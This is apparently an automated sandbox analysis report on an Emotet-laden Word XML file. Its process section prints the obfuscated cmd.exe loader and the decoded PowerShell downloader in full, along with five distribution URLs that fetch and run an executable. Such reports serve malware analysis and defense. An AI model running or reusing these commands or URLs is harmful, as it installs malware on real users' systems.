
2019-01

Full analysis: https://app.any.run/tasks/cf39a3f5-4730-41f0-b5ca-8dffb566844e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 22:04:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet-doc, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: F4BAE2AE6AC61C0C669A44D0C4531C3C
SHA1: D1344BB4955F4D83626439F2C89230026A1C9A29
SHA256: A97830126F063CC663FDAF187D2162231D79E1B256CB9AAB19FF3A71BBCEA1AA
SSDEEP: 3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3188)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2656)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2788)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2624)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2624)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2984)
    • Creates files in the user directory

      • powershell.exe (PID: 3188)
    • Application launched itself

      • cmd.exe (PID: 2656)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4060)
      • cmd.exe (PID: 2656)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2624)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2624)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (28.6)
.xaml | Microsoft Extensible Application Markup Language (7.7)
.xml | Generic XML (ASCII) (2.1)
.html | HyperText Markup Language (1.2)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00F17EA2
WordDocumentBodySectPRsidRDefault: 00187F7A
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00187F7A
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (base64-encoded binary data omitted)
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
Total processes: 38
Monitored processes: 7
Malicious processes: 5
Suspicious processes: 0

Behavior graph

start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID | CMD | Path | Indicators | Parent process

PID: 2984
CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\2019-01.xml"
Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 0
Version: 14.0.4750.1000
PID: 2624
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-01.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000
PID:
4060
Command line:
c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"
Path:
c:\windows\system32\cmd.exe
Parent process:
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2656
Command line:
CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2700
Command line:
C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2788
Command line:
cmd.exe
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
3188
Command line:
powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 813
Read events
1 349
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED61.tmp.cvr | | | |
| 2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98D08BF8.jpg | | | |
| 3188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKK579YCFXJ4079X2R5N.temp | | | |
| 2624 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | DCAA67B0E70660D81D617FA974400603 | 9FABD5C9F34C29E3100E05A15E1B4542A4BAF8849FC0CED4847B6465D692BCF4 |
| 3188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fbf8.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 3188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$019-01.xml | pgc | 762CDCC2F2C06FD90AB917B29397A1A6 | C624E166490F876250B58A017508582C146852A436C17EE36999258048831FA5 |
| 2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 2229E97A0FC24435EA0B9B2679208C4A | 3A67027CAE69D622F7F55A5E07AF7305831D624F7354F91A51BE0A3B80C577F7 |
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3188 | powershell.exe | GET | | 164.138.208.39:80 | http://jumesamedina.com/FKcXltRa/ | ES | | | malicious |
| 3188 | powershell.exe | GET | 301 | 164.138.208.39:80 | http://jumesamedina.com/FKcXltRa | ES | html | 241 b | malicious |

Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3188 | powershell.exe | 164.138.208.39:80 | jumesamedina.com | Cyberneticos Hosting SL | ES | malicious |

DNS requests

| Domain | IP | Reputation |
|---|---|---|
| jumesamedina.com | 164.138.208.39 | malicious |

Threats

| PID | Process | Class | Message |
|---|---|---|---|
| 3188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
| 3188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
No debug info